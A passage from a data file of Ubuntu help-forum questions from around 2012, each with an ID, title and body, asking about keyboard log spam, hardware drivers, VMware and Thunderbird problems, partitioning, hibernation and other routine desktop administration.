idea what this causes this ?
116538	atkbd.c spamming the logs . how to get rid ? what is this ?	on my vostro 1000 notebook the following messages spam my dmesg : [ 18678.728936 ] atkbd.c : unknown key released ( translated set 2 , code 0x8d on isa0060/serio0 ) . [ 18678.728941 ] atkbd.c : use 'setkeycodes e00d < keycode > ' to make it known . [ 18679.831109 ] atkbd.c : unknown key pressed ( translated set 2 , code 0x8d on isa0060/serio0 ) . [ 18679.831119 ] atkbd.c : use 'setkeycodes e00d < keycode > ' to make it known . [ 18679.841607 ] atkbd.c : unknown key released ( translated set 2 , code 0x8d on isa0060/serio0 ) . [ 18679.841615 ] atkbd.c : use 'setkeycodes e00d < keycode > ' to make it known . [ 18680.901733 ] atkbd.c : unknown key pressed ( translated set 2 , code 0x8d on isa0060/serio0 ) . [ 18680.901744 ] atkbd.c : use 'setkeycodes e00d < keycode > ' to make it known . [ 18680.911536 ] atkbd.c : unknown key released ( translated set 2 , code 0x8d on isa0060/serio0 ) . [ 18680.911546 ] atkbd.c : use 'setkeycodes e00d < keycode > ' to make it known . it 's most probably not from an actual key because it appears in regular intervals . first what is it ? it could be my battery since it 's nearly dead , as in loadable to 11 % of the initial capacity , but i have no evidence for that . what is this / how can i find out where this comes from ? how can i get rid of it ? is there a 'dud ' keycode ? when i assign a keycode with sudo setkeycode e00d $ ( random keycode ) the key does actually get pressed . that makes it impossible to enter sudo password for example . so any 'real ' keycode is not an option . it has n't been like that half a year ago . even better than the dud keycode would be a real fix . it happens from 10.04 to 12.04 ( before that i do n't know ) . i did read zcat /usr/share/doc/udev/readme.keymap.txt.gz |less as suggested in the ubuntu wiki . /lib/udev/findkeyboards & & sudo /lib/udev/keymap -i input/event5 produces what appears to be newlines in rapid succession . sudo udevadm monitor does n't show the event .
116547	copy ubuntu distro with all settings from one computer to a different one	i 'd like to copy my exact setup from my computer at work to my computer at home . i 'm trying to figure out how to go about doing that . so far i 've figured this much out . on the source computer run dpkg -- get-selections > installed-software and backup the installed-software file backup /etc/apt/sources.list backup /usr/share/applications/ to save all my custom quicklists backup /etc/fstab to save all my network mounts backup /usr/share/themes/ to save the customization i 've done to my themes i 'm also going to backup my entire home directory . once i get to the destination computer i 'm going to first do just a fresh install of 11.10 then i 'll copy over my home directory , /etc/apt/sources.list , /usr/share/appications , /etc/fstab and /usr/share/themes/ then i 'm going to run dpkg -- set-selections < installed-software followed by dselect that should install all of my apps for me . i 'm wondering if there 's a way/need to backup dconf and gconf settings from the source computer ? i guess that 's my ultimate question . i 'd also like any notes on anything else that might need backed up as well before i undertake this project . i hope this post is legit , i figured other people would be interested in knowing this process and i do n't see any other questions that seem to really document this on here . i 'd also like to further this project and have each computer routinely backup all the necessary files so that both computer are basically identical at all times . that 's stage 2 though ...
116553	what package replaces dkim-filter in 12.04 ?	previously , i was using the dkim-filter package in ubuntu 10.04 lts for dkim . that package is no longer in ubuntu 12.04 lts . what 's the replacement or alternative ? opendkim , maybe ?
116554	how to login with previous open programs when ubuntu is log out or shutdown like in kde	if you open some applications in kde and log out or shutdown your computer or device you can when log in again it automatically open the last open applications . is that possible on unity 2d and 3d ?
116557	internal microphone not working in google talk	my laptop is lenovo t400 , which has an internal microphone . my os is ubuntu 10.10 . my browser is firefox 11.0 . the internal microphone works fine , because i can use it to record my voice using audaciy . however , in google talk , i have choose `` internal audio analog stereo '' in `` settings - > voice and video chat - > microphone : '' . but when i click `` verify your settings '' , it does n't work . neither can i speak to others using google talk . i wonder why ? thanks and regards !
116562	how to get my windows docs ; pics , mp3 , and docs off an external usb hard drive ( sata 3.5 enclosure )	back when i had windows 7 , i cloned my internal hard drive to an enclosed external usb hard drive . i then formatted my internal hard drive and installed ubuntu 11.10 as my only os . how do i migrate my files , pics , mp3 's , and etc off the external drive and back to my internal drive which now only has ubuntu on it . ( and why is this process not made easier ? ) i have tried logging in as the root user but i can not find the external device . i have downloaded several different apps to manage files , usb sticks and etc . please help ! ! ! *additional info** i cloned in win7 with a program called `` xxclone '' i also used the option to make it bootable , which did not work apparently . i also should note that at the time of the disk cloning , i had a live version of ubuntu 11.10 on it in what i think is a dual boot mode . ( where you have the option of which os to run at start-up ) when i plug the drive enclosure into a friends pc that has windows , i can see all my files , non-hidden system files , and etc . the drive is just not bootable by itself . ( ie . when i take out my internal harddrive , change bios order , and attempt to boot with only the external hard drive ) the laptop just cycles through from the hp logo ( i think thats what a `` post is ) to windows can not start , launch startup repair , to insert windows installation disk or contact system administrator , back to hp screen . i wonder if i could take the external drive and try to install ubuntu off a usb stick , if i could run it in a dual boot , and some how transfer my files . my original , internal drive got accedently formatted , however , when i was trying to partition it for an install of ubuntu several days ago . i realized my not so smart mistake and i 'm sure it 'll make some of you laugh ! in my first attempt to install ubuntu ; that resulted in a formatted hard drive , i installed a disk image of ubuntu , not on a usb flash drive , but on the drive i intended to install the os . learning is so fun : ( the command lsusb returns the following : bambos @ bambos-hp-pavilion-dv4-notebook-pc : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 003 : id 03f0:241d hewlett-packard gobi 2000 wireless modem ( qdl mode ) bus 002 device 003 : id 046d : c31c logitech , inc . keyboard k120 for business bus 002 device 004 : id 090c:137b feiya technology corp . bus 002 device 014 : id 2109:3431 bus 002 device 015 : id 0bda:0301 realtek semiconductor corp . bus 002 device 016 : id 1ca1:18a9 nothing happens when i plug it in to my laptop and turn on the enclosure . i did however find 2 icons in `` computer '' named generic usb 3.0 crw ( 1 and 2 ) . but i am unable to open them . my enclosure is a rocketfish 3.5 sata enclosure and has a 3.0usb connector . i have 2 usb ports on my laptop and as far as i know , they are both working . ( installed ubuntu off a usb 4gb stick , and have a usb keyboard working . it 's interesting that i can plug a usb wireless mouse into a usb port located on the enclosure itself , and the mouse works .
116565	unable to install vmware workstation v8	installing vmware 8.0.2 64bit ubuntu 12.04lts 64bit beta my kernel version is : 3.2.0-20-generic pst007x @ pst007x-aspire-5741 : ~ $ sudo sh vmware-workstation-full-8.0.2- 591240.x86_64.bundle installs ok when i launch i am asked to install modules which are compiled and loaded into the running kernel . a window opens vmware kernel module updater this fails on virtual network device error log . update : patch . when i try to add patch , following error : pst007x @ pst007x-aspire-5741 : ~ $ sudo sh patch-modules_3.2.0.sh [ sudo ] password for pst007x : patch-modules_3.2.0.sh : 27 : [ : workstation8.0.2 : unexpected operator patch-modules_3.2.0.sh : 28 : [ : workstation8.0.2 : unexpected operator sorry , this script is only for vmware workstation 8.0.2 or vmware player 4.0.2 . exiting pst007x @ pst007x-aspire-5741 : ~ $ i have fully un-installed , and re-installed . i am installing the correct version . probably a problem with the patch . vmware installs perfectly on ubuntu 11.10 this is how i uninstalled .
116566	radeon hd5570 hdmi video card 5.1 audio does n't work	i am using ubuntu and xmbc on my htpc and have chosen the radeon hd5570 video card which has an hdmi output . in the sound preferences there is no surround sound option for the video card just stereo and although i can get sound through it in xbmc , my receiver does not state dolby digital on movies that are in fact dolby so its definitely not giving me the true sound it should . does this card not support surround sound through hdmi and i somehow missed it ? if that is the case does anyone have suggestion that has been tested and works ? id like to know its going to work before investing in yet another video card . update i purchased a nvidia geforce gts 450 , plugged it in , downloaded the proprietary driver from the system control panel , disabled the onboard audio from the bios ( not sure if this was necessary but i did it anyways ) , and changed the sound settings to use the new video card . everything works flawlessly . it was a seemless setup .
116567	error/message : the disk drive for /home is not ready ... when connecting an external hard drive	i am running ubuntu 10.04 all updated installed to date ( 3/28/2012 ) and when i connect another sata hd i get this message the disk drive for /home is not ready yet or not present continue to wait , or press s to skip mounting or m for manual recovery so i press s but i get this message could not update iceauthority file /home/username/.iceauthority and when a press close i get this there is a problem with the configuration server ( /usr/libconf2-4/gconf-sanity-check-2 exited with status 256 ) and when a press close i get message nautilus could not create the following required folders : /home/username/desktop , /home/username/.nautilus before running nautilus , please create these folders or set permissons such that nautilus can reach them and finally when a press ok at the last message it disappears and i get a blank screen with a lot of colors on it and with nothing else so i shutdown ( power button ) and disconnect the hd and boot without problems so how to fix this in simple commands because i am a total linux noob notes -in the original error my username was in place of username i wrote ( did not want to confuse anybody ) -i tried searching for this problem but a got a lot of different answers and most of them were really complicated to me and not working -i got a data hd connected and working without problems also the hd i installed ubuntu on is sata ( maybe it helps ) -apologize for me bad english its not my mother language here is the fstab file /etc/fstab : static file system information . # use 'blkid -o value -s uuid ' to print the universally unique identifier for a device ; this may be used with uuid= as a more robust way to name devices that works even if disks are added and removed . see fstab ( 5 ) . # proc /proc proc nodev , noexec , nosuid 0 0 / was on /dev/sda3 during installation uuid=9e2c3d2d-20a2-487a-b7cf-3a13d6b1f6d8 / ext4 errors=remount-ro 0 1 /dev/sda6 /home ext4 defaults 0 2 /dev/sda5 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0
116568	download and save install files for moonlight	where can i just download a copy of moonlight ? the official page will only let me install it in firefox and not download and save the install files . thanks in advance . bob .
116571	owncloud on ubuntu	i have installed owncloud on ubuntu but i can find it on the menu dash , i even try to run own terminal by typing owncloud , but nothing start i also have an ubuntu 1 account but i also would like to use owncloud can i use owncloud on ubuntu ? our do i have to be with kde to use owncloud ? or do i have to install another package ? i have install owncloud from synaptic i am using ubuntu 12.04 beta
116574	minimum brightness level is brighter than the levels just above it	i 'm using a macbook pro 8,1 . when i use the brightness keys on the keyboard , decreasing the brightness works until it reaches the lowest brightness level . at that point ( when on the lowest level ) , the brightness is something like 70 or 80 % instead of 0-10 % ( or whatever it usually is ) . all the other levels are fine . how can i adjust/calibrate these brightness controls ? ps : i 'm currently using 12.04 but i 've had the same issue no later than 11.10 ( and i 'm fairly confident it was present in 11.04 as well ) . update : if i go to system settings and select `` brightness and lock '' the exact same thing happens , but there is more fine grained control of the brightness . it goes to completely black when the dial is about 10 % from the left edge . when it passes that point , anywhere inside that left 10 % appears to be about 70 - 80 % brightness ( there 's no change regardless of where the dial is in this section ) .
116575	where are apt-get files stored ?	i have an ubuntu with three virtual machines running inside running ubuntu also i update the host using apt-get update but i can update vm 's , it takes a long time + uses a lot of bandwith which i 'm running out of , i want to transfer the updated files by apt-get to vms , could you please tell me where are they ? i 'm not talking about the packages themselves stored in /var/cache/apt/archives , i want the file that stores list of available packages on mirror i have selected , thanks lot ps : i know this question has been asked somewhere but i cant find it ! well , the answer i wanted was this : /var/lib/apt/lists but there is a better solution in the answers here anyway
116580	how do i get my ubuntu to boot	i recently decided to install ubuntu as a second option for running my system . when i went to install it i placed it on a drive that is connected via a usb however when i boot up there is no option to go to that drive and it goes strait to windows instead how do i get it to give me an option to boot to ubuntu ?
116581	thunderbird crashing again and again	since past two days , my thunderbird is crashing again and again . as soon as i open and click on an email entry , it crashes instantly . if i dont click on an email entry then it remains up . quite strange . please suggest .
116584	install win7 from recovery - protect current lubuntu install	i got a new laptop in december and immediately wiped windows , installed ubuntu ( later tried xfce , kde , now lxde and happy ) , and left the recovery partition intact . the idea was that if anything was wrong with the laptop , i could restore win7 from the recovery for warantee purposes ... i 'm having some major sound issues , and finally getting around to looking into it . i 'd like to reinstall win 7 to ensure the sound issues are not hardware ( speakers ) , before pursuing lengthy troubleshooting ( i 've done the basic stuff already ) . can i do this ? can i do this and preserve my current lubuntu install , with some degree of confidence ? i understand there is always a risk when repartitioning . how ? thanks !
116585	how to use ubuntu one through terminal on mini-ubuntu	how do i access ubuntu one through terminal ? i have only a minimal ubuntu ( precise ) , i downloaded all packages that i should be able to use , but how do i start ? how do i connect to the cloud using terminal only ?
116590	how do i install openoffice.org instead of libreoffice ?	i want to install openoffice.org . what can i do to install it on my computer ?
116593	is there an ubuntu one client for windows phone ?	great job all ! how about a client for windows phones since a client is working for windows 7 ? keep up the great work .
116597	hibernate issues , ubuntu 11.10	i am having issues hibernating my machine ( i 'm running ubuntu 11.10 ) . i initially thought it was lack of swap space that was the issue but after following the instructions outlined in http : //ubuntuforums.org/showthread.php ? t=1042946 to make and enable a swap file , i still have not been able to hibernate successfully . it freezes while preforming the following precess : '' saving 208370 image data pages '' it refuses to make progress after 11 % . one possibility i can thin of is that i might have used the incorrect uuid as described in the link above . there was some ambiguity on which device to identify with the swap file i created . this is what i get when i run sudo blkid /dev/loop0 : uuid= '' 6e865e3b-9d88-4d4f-8987-2e3022056107 '' type= '' ext4 '' /dev/sda1 : uuid= '' 1e54793154790d31 '' type= '' ntfs '' /dev/sda2 : uuid= '' a47a-0e57 '' type= '' vfat '' /dev/sda3 : uuid= '' 12107d0b107cf757 '' type= '' ntfs '' /dev/sdb1 : label= '' pendrive '' uuid= '' 5455-9fb7 '' type= '' vfat '' /dev/zram0 : uuid= '' 704af4d4-77cd-4620-8204-69f525e761e9 '' type= '' swap '' /dev/zram1 : uuid= '' d3c4955f-0b76-4587-8473-880317f25bc0 '' type= '' swap '' i appreciate any help , allan gamboa
116599	skype autostart with empathy in ubuntu	i 'm using the empathy and installed the 'pidgin-skype ' package to use skype in empathy . it 's work just perfect , but when i open the empathy it does n't start skype automatically . in settings it 's possible to use mark `` autostart '' and it ask for `` skype path '' . i tried with `` /usr/bin/skype '' ( which open skype trough terminal ) , but it does n't work . i tested with pidgin , and it work without changing any settings . the path is wrong or is any problem with the package ? and if does n't work , is it possible to automatically open skype everything empathy is open with other way ? some script or workaround ? thanks
116601	how to prevent network manager from auto creating network connection profiles with `` available to everyone '' by default	we have several laptops at work which use ubuntu 11.10 64bit . i have our wifi access point requiring wpa2-eap authentication ( backed by a ldap server ) . i have the staff using these laptops when doing presentations by using the guest account . so by default when you have a wifi card , network manager will display available wireless access points . so the logical course of action for a novice ( tm ) user is to single left click the easy to use option in the network manager drop down list ... at this point the staff member ( who is logged in with the guest account ) expects to just be able to connect and enter any authentication details if required . but because they are using the guest account , they wo n't ever have admin permissions ( nor do i want them to ) , and so polkit kicks in with a request for admin authorisation . i solved this part by modifying the polkit permissions required to allow all users to create system network connections ... however , because these staff members are logging onto the wifi access point with ldap credentials and because the network manager is now saving those credentials as a system connection , their password is available for the next guest user session ( because system connection profiles are stored in /etc/networkmanager/system-connections.d/* ) . it creates system connections by default because `` available to all users '' is ticked by default when you quickly connect to a new wifi access point . i want network manager to not tick this by default . this way i can revert the changes i made to polkit and users network connection profiles will be purged when they log out .
116602	how to install xfce desktop environment ?	i have read this post how do i switch to xubuntu ? , but it tells me to install xubuntu-desktop . can i install xfce ( only ) ? i mean , i do n't want to install any application which is not related to xfce desktop , but becomes dependency of xubuntu-desktop , such as abiword , gthumb , etc . what package should i install ?
116606	synaptic manager , update manager not working	i get this when i update my ubuntu 12.04 e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_i18n_translation-en e : the package lists or status file could not be parsed or opened . how to fix this ?
116611	help with home folder also see `` home '' folder	there are two home folders , viz `` home '' and `` home '' . the correct one is `` home '' folder which does n't open as the default home folder . this duplicity is causing me problems in saving my work . most of them show wrong file path . please check the path . how do i get back a single ( correct ) home folder which it should be ? any help will be appreciated .
116613	how to install thunderbird 10.0 after thunderbird 11.0 is already installed ?	thunderbird 11.0 is causing a lot of crashes and i 'm not alone in this experience . it was automatically recently updated though the ubuntu software centre . i figure if i return to version 10 , that will solve the problem . how can i uninstall version 11 and go back to version 10 of thunderbird without losing any settings or mail data ?
116615	davicom dm9601 usb lan nic ubuntu 11.10 issue	i have a davicom dm9601 usb ethernet card . when i plug in the device , it is detected and drivers are loaded , but i ca n't connect to internet using it . it works perfectly on xp , other laptop but not working on ubuntu 11.10 how can i install the driver for this ? i have tried many things but nothing is working . if i go to this link driver but not compiling or may i be doing something wrong . i found this one but do n't know how to follow these steps . this is my lsusb output : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 004 : id 064e : a103 suyin corp. acer/hp integrated webcam [ cn0314 ] bus 003 device 002 : id 08ff:1600 authentec , inc. aes1600 bus 005 device 002 : id 0a46:9601 davicom semiconductor , inc. dm9601 fast ethernet adapter bus 006 device 002 : id 046d : c045 logitech , inc. optical mouse bus 003 device 003 : id 0a5c:2101 broadcom corp. bluetooth controller bus 004 device 002 : id 04d9:1702 holtek semiconductor , inc . but when i connected my internet from different system its start working .
116619	ubuntu 11.10 , kernel 3.0.0-17 booting problem `` hangs ''	i 've update the kernel from 3.0.3-16 to kernel 3.0.0-17 but it hangs after after giving starting lightdim [ ok ] while its installed on vaio vgn-fz340e [ 32 bit ] ssd hard disk and the graphic card is nvidia geforce 8400m gt and the driver is the latest version which is 295.33 any one can give me a help please
116621	can you help me with facebook videocall ?	i am unable to a videocall in facebook . is there any plug-in , which can help me ?
116622	installing ubuntu 10.04 over top 11.04	im looking to install 10.04 over top the 11.04 partition , it wouldnt let . keeps giving me a `` root file system not found '' error ever time i manually select partition . ( i have a win7 partition ) 11.04 popped up after upgrade that my hardware isnt supported for unity . and i cant boot into it , hangs up on purple screen right after boot menu . if anyone can post a link to a how to guide or put it on here , would be great ? im trying to take advantage of my nvidia geforce gt 120m ( its a laptop ) to play around with cuda/c++ programming !
116623	default shell for remote commands through ssh	i have the following setup on my ubuntu 10.04 box ~ $ echo $ shell /bin/bash ~ $ grep $ user /etc/passwd ubuntu : x:1000:1000 : ubuntu , , , :/home/ubuntu : /bin/bash however , when i run a remote command , zsh seems to be the default shell : $ > ssh -i /path/to/ssh/key ubuntu @ < my-host > `` echo $ shell '' /bin/zsh how do i fix this ?
116635	kernel panic not syncing vfs unable to mount root fs on unknown block oo swapper not tainted	i updated my laptop ( ubuntu ) to 11.10 and i do n't know what went wrong that when i restarted the computer it would start and it would only tell me . kernel panic not syncing vfs unable to mount root fs on unknown block oo swapper not tainted ... i am a new user and i have no idea what to do . any ideas ?
116643	how to know how much voltage/watts a device uses	i wanted to know if there is a terminal command or gui app that can show me for example how much electricity ( watts , voltage , etc.. ) a device is using . for example , if i have 3 hard drives , how much they are using . how much is the motherboard using and any other device . is it possible to check ?
116647	where is the best place to start projects and attract developers ?	i want to develop software for linux or cross-platform . i want to work with other open-source and non-profit developers . i want a place where ubuntu or other developers come to start open-source or commercial projects , and we can join the projects or start our own projects . i know there are social coding sites , but where can i start the project , and invite people or let people join ? then we can submit software to sourceforge.net . i know we can start projects at sourceforge.net , but is there anything more dedicated for ubuntu developers , especially for ubuntu and for the ubuntu software center ? would you recommend launchpad , sourceforge.net , github , gitorous or others ?
116648	how do i monitor disk usage by processes over time ?	i can see my ubuntu instance ( on a cloud provider ) averaging thousands of blocks per second , yet when i observe in real time it 's hard to see which process is causing this . is there a monitoring command i can employ and let it run for an hour or so and then collect disk usage information ( e.g . which processes were most active in this respect , or even which files ) ?
116651	how to let ubuntu index and find files on a different ( windows ) drive when searching ?	i love the unity dash and lenses , but it only finds files that are under /home/mylogin i would like it to find files that are under /media/mywindowsdrive/users/mywinlogin i tried creating a link to the music , pictures and video folders on my windows driver and putting the link in the corresponding folders in /home/mylogin , but this does n't cause ubuntu ( the dash ) to index and find these files . is this possible ?
116655	what is the command to run system settings from a terminal ?	system settings can be run from the launcher ( pinned by default ) , the dash , or the power cog . but what command would i enter in a terminal window if i want to run it from there ?
116662	shotwell 0.12 shared library error	i installed shotwell 0.12 like so via its official ppa sudo add-apt-repository ppa : yorba/ppa sudo apt-get update sudo apt-get install shotwell and when i tried to run it via dash it did n't start . i then typed in the gnome-terminal `` shotwell '' i then got this error error while loading shared libraries : libgexiv2.so.0 : can not open shared object file : no such file or directory my question is how to get shotwell 0.12 up and running in ubuntu 11.10 amd64
116663	how to get rid of bookmarks in synced chromium	i 'm using three ubuntu systems in an irregular pattern , and since i use chrome/chromium anyway and have a google account , i decided to make my life a bit easier and sync them . now i am having a problem : when i want to remove bookmarks from my lists , they not only come back when i switch the machine , they double . by now , i have up to ten identical bookmarks in the list and i spend a lot of time scrolling over them . is there any way to remove them permanently ? edit : apps , too .
116664	nautilus pops up after suspend	every time i wake up my netbook with ubuntu 11.10 after suspend , nautilus pops up to show me the contents of the sd card that is always plugged in just like i 've just put it in . i set it to `` do nothing '' when an external storage device gets plugged in ( which it obeys to ) but it still pops up after suspend . how do i disable this feature ?
116670	finding directories inside a folder and deleting if smaller than a certain size ?	what command can i execute to check the directories inside a folder and if the total size of the directory is smaller than 30mb , delete it ? i played around with the find command trying to move files based in the size but it did n't work properly . i was using ( for 1mb ) : find . -size +102400k -exec mv directory find . -size -102400k -exec mv directory
116674	another ubuntu one music problem with id3-tags ( `` unknown artist '' problem )	i started using ubuntu one a few days ago . i put some mp3s into the cloud music folder and i can play them just fine in the music web and andriod applications . the problem is that all files are sorted under `` unknown artist '' and `` unknown album '' and the title is either the file name or a part of it ( which is from the service `` guessing the title '' i guess ) . it seems the problem happened before . i looked in the faq , which said this happens with m4a files , but i use mp3 files . the id3 tags are correct and are tagged with id3v1 and id3v2 . i read to wait , until the service can catch up with the tagging , so i waited 24 hours , still nothing . every single file is still listed under unknown artist/unknown album . i 'm running out of options here : /
116684	change function keys	i 'm running ubuntu 11.10 with unity . i use google chrome 's developer tools and firefox firebug to debug my javascript . in both of them , the way to step over the next call is by using the f10 key , that in unity is assigned to open the current application 's top menu . i would like to change this default behaviour , so i can debug my code propperly . thanks
116687	how to have multiple path separators in bash	i have few python scripts which were written by someone else in windows . these scripts use double backslash as path separator but when run in ubuntu they do n't work because of this . i can change all \ to / and scripts will work but there are lot of scripts and its a lot of effort to change each \ to / so my question is : is it possible to add \ as path separator in ubuntu or only in bash so that i dont have to modify these scripts ? example code : # append common directory to the python search path sys.path.append ( '..\\..\\.. ' + os.sep + 'common ' )
116691	created compiz startup file . ca n't find it anymore and it needs to be deleted	i tried to make compiz start up automatically . it starts up automatically now , but it causes the main ubuntu menu to be disabled . i would like to change the way it starts up , but i forgot which file i created/edited to make compiz start automatically . how can i see which file makes the compiz process to start up ? thanks in advance .
116693	its taking too much time for copying files into pendrive	i 'm using ubuntu 11.10 , please help me . its taking too much time for me to copy files onto my pendrive . same pendrive is working at an acceptable transfer rate in windows .
116699	where my fileicons in chromium gone ?	having the problem with chromium 17.0.963.79 that the fileicons in the downloadmanager are missing . i am using ubuntu 11.10 unity with it 's default theme and icons . how can i fix this ? screenshot of missing icon : http : //www.picbutler.de/bild/247099/missingicon53no4.png
116700	how do i use thunderbird without an outgoing mail server ?	i want to use thunderbird for making backups . this is a read-only operation and does not require an outgoing mail server . thunderbird , however , apparently feels it knows more about my needs than i do and disables the button i need for adding a pop3 account until a working , tested ( ! ) smtp server is added : i 'm about ready to stab my computer screen out of frustration . how do i regain control ? please do n't ask me to use a different mail client . i understand that there are a variety of alternative methods for performing email backups , but i specifically want a solution that uses ubuntu 's default , officially supported application .
116706	screen resolution	i am very new to ubuntu , just switched to windows to linux environment and choose the best ubuntu flavor to taste . my screen resolution is set to 1024 and when i try to change the resolution from settings , i ca n't find any resolution in drop down other than 1024 . how to fix this . thanks .
116708	regarding partitions for dual-booting ubuntu with pre-existing windows 7	i have zero actual experience with configuring disk partitions and the stuff i have read for the past few hours have been confusing me a bit , so please bear with me . first of all , i 'd like to explain what i 'm setting to achieve : windows 7 with : c : \ windows 7 ( pre-existing installation ) d : \ data ( already exists and has files already ) ubuntu 11 - does not exist yet , but i already have a livecd in hand . \root directory for ubuntu \home on its own partition i plan \swap on its own partition with around 8gb here is the current situation : i have a single 500 gb hard-disk with windows 7 x64 installed , and the current partition schemes is as follows : system reserved : 100 mb ( primary , active ) c : 100 gb - where windows 7 is installed ( primary ) d : 365 gb - where my files are located , lots of free space ( primary ) now , i would like to shrink my d : drive and create around 40 gb of unallocated disk space for the ubuntu installation , but here what 's confusing me a bit : i 'm thinking i would create an extended partition and subdivide it into 3 logical partitions for the ubuntu setup i had in mind . ( if you think my setup is a bad idea , please let me know & why . i also hope you can suggest a better one ... ) i am aware that i can only have up to 4 primary partitions , or 3 primary partitions with 1 extended parition max . now , does the system recovery portion count as one primary partition ? i 'm really new to these things and it is totally unclear to me . in shrinking my d : drive using windows 7 's disk management tool , i would get an unallocated free space which i do n't know how to make an extended partition from . it seems like i can only create a primary partition from it , not an extended one . how do i go about it ? ( i 'd also like to note , if it is of any importance , that i am trying to avoid using the option to install ubuntu alongside windows , and much rather prefer using the custom install where i can specify which drives i wish to use and stuff . somehow i feel its safer that way . )
116712	how to install samsung scx printer driver from cd ?	i tried to install from the cd the driver of my printer , a samsung scx-3200 . how can i install the printer driver ?
116716	how do i determine which repository is slowing me down ?	whenever i check for updates with the update manager or synaptic ( i do n't like the software center so i do n't use it ) , there seems to be one repository that takes forever to check . the progress bar stops at something like 230 out of 231 files , and then hangs there for minutes on end . if i click on `` show for individual files '' there 's this huge list of files , and a lot of them seem to repeat , and they are n't ordered by progress , so it 's near impossible to search through them . is there a way i can figure out which repository , file , or whatever it is that is causing the slowdown so i can determine what to do about it ?
116719	what positive changes will nvidia support to linux release ?	i 've recently heard about nvidia is joining the linux foundation . i just tought , well here comes full functioning nvidia drivers . my card is a g210m , and i have graphic acceleration , glxgears echoes 2400 fps . gtk benchamark doesnt go that well ( gtkperf show slow results ) . everithing is fine , but i cant switch to virtual terminals . with nouveau i have a little graphic acceleration with glxgear throwing 1100 fps , but the virtual terminal works . i ' ll never understand , why nvidia doest release a full linux functioning driver . will this joining to the linux foundation resolve this ?
116721	why is my intel wireless 5100 card performing at half of its capacity ?	i allways wonder about the broadband in my intel wifi link 5100 . i have a wireless n network at home and this is confusing . in windows 7 the adaptere says it is at 350mbps with win drivers . in ubuntu , conection informacion just say 150mbps . same adapter , same n-network . im using intel opensource driver , i 'd check at the modules and intel module is active . why is this happening ?
116722	fatal x server error : failed to submit to batchbuffer	ubuntu 10.04 lucid lynx used to run fine on my computer . since a few weeks , my x server crashes out of the blue while the computer is idle and i 'm logged into a gnome session . ( i 'm then greeted with a new gdm login prompt ) . after the crash , /var/log/gdm/:0.log.1 has the following : fatal server error : failed to submit batchbuffer : input/output error please consult the the x.org foundation support at http : //wiki.x.org for help . ~/.xsession-errors.old has symptoms of x clinets dying : nm-applet : fatal io error 11 ( die ressource ist zur zeit nicht verf端gbar ) on x server :0.0. dmesg says : [ 191848.390081 ] [ drm : i915_hangcheck_elapsed ] error hangcheck timer elapsed ... gpu hung [ 191848.390086 ] render error detected , eir : 0x00000010 [ 191848.390088 ] ipeir : 0x00000000 [ 191848.390090 ] ipehr : 0x01800002 [ 191848.390091 ] instdone : 0xffffffff [ 191848.390093 ] instps : 0x8001e020 [ 191848.390095 ] instdone1 : 0xbfffffff [ 191848.390097 ] acthd : 0x0a47b014 [ 191848.390099 ] page table error [ 191848.390100 ] pgtbl_er : 0x00000002 [ 191848.390103 ] [ drm : i915_handle_error ] error eir stuck : 0x00000010 , masking [ 191848.390127 ] [ drm : i915_do_wait_request ] error i915_do_wait_request returns -5 > ( awaiting 5617217 at 5617205 ) is this a known problem that can be traced back to the x server from ubuntu repositories ? how would i debug this ? edit : there 's a relevant bug on lp .
116725	how can a run a login/logout script as root ?	how can i make login/logout scripts ? something like /etc/gdm/postsession/default and /etc/gdm/presession/default .
116733	sound issue in ubuntu 10.10	my system is vaio vpceg28fn . i am using ubuntu 10.10 and my sound card is hda intel pch , chip : conexant id 506e . i have a problem and it is that sound plays through the speakers and the headset simultaneously . also the headset is not shown in alsa mixer . can anyone help me ?
116739	how can i make the lightdm lock screen my gnome-shell lock screen in 12.04	in unity , lightdm is the default lock screen . is it possible to make lightdm my default lock screen in gnome-shell ?
116741	how to hide all desktop icons in 12.04 ?	in 11.10 using configuration editor , one used to be able to edit a boolean parameter named : desktop_show this allowed to hide/show all desktop icons . this latter was removed in 12.04 . someone , knows how to hide desktop icons automatically ? thanks
116743	status of tuxonice in 12.04 ?	ubuntu 12.04 contains tuxonice-userui package ( userspace utilities for tuxonice ) , but fails to provide tuxonice-patched kernels - making the former package useless . what is the status of tuxonice in ubuntu 12.04 ? is it to be part of this distribution , or not ? if yes , why kernels are missing , if not , what is tuxonice-userui doing here ?
116744	restore the ctrl + alt + num pad 4 and 6 window positioning commands ?	using unity in ubuntu 12.04 , the ctrl + alt + num pad combination for positioning windows no longer works completely consistently : ctrl + alt + 4 ( move window to left half of screen ) was changed to ctrl + super + left arrow . a similar change moved ctrl + alt + 6 to ctrl + super + right arrow . so in 12.04 one moves windows to corners using ctrl + alt combos , but super combos are needed to move to the left or right . this is more than a convenience problem since the new windows positioning provided by the super key combos seems to give different sizes than the ctrl + alt combos they replaced , leading to distracting gaps between windows when you combine the two methods to position three or more windows on one screen . is there a way to restore the previous behavior so that i can use ctrl + alt + num pad for all window positioning ?
116748	where is the graphics card driver fot nvidia geforce 610m on ubuntu 10.10 ?	the graphics card of my notebook is nvidia geforce 610m . i installed ubuntu 10.10 . i installed nvidia-linus-x86_64-295.33.run , but it seems not support nvidia geforce 610m . which driver should i use to support my grapics card properly ? thank you .
